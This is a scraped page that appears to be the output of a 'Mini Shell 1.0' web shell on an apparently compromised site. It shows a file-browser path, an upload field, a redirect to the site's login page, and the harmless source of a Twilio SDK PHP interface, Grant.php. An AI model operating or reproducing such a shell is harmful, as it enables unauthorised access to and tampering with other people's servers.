HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/cwd/vendor/twilio/sdk/src/Twilio/Jwt/Grants/
Upload File :
Current File : //proc/self/cwd/vendor/twilio/sdk/src/Twilio/Jwt/Grants/Grant.php
<?php


namespace Twilio\Jwt\Grants;


interface Grant {
    /**
     * Returns the grant type
     *
     * @return string type of the grant
     */
    public function getGrantKey(): string;

    /**
     * Returns the grant data
     *
     * @return array data of the grant
     */
    public function getPayload(): array;
}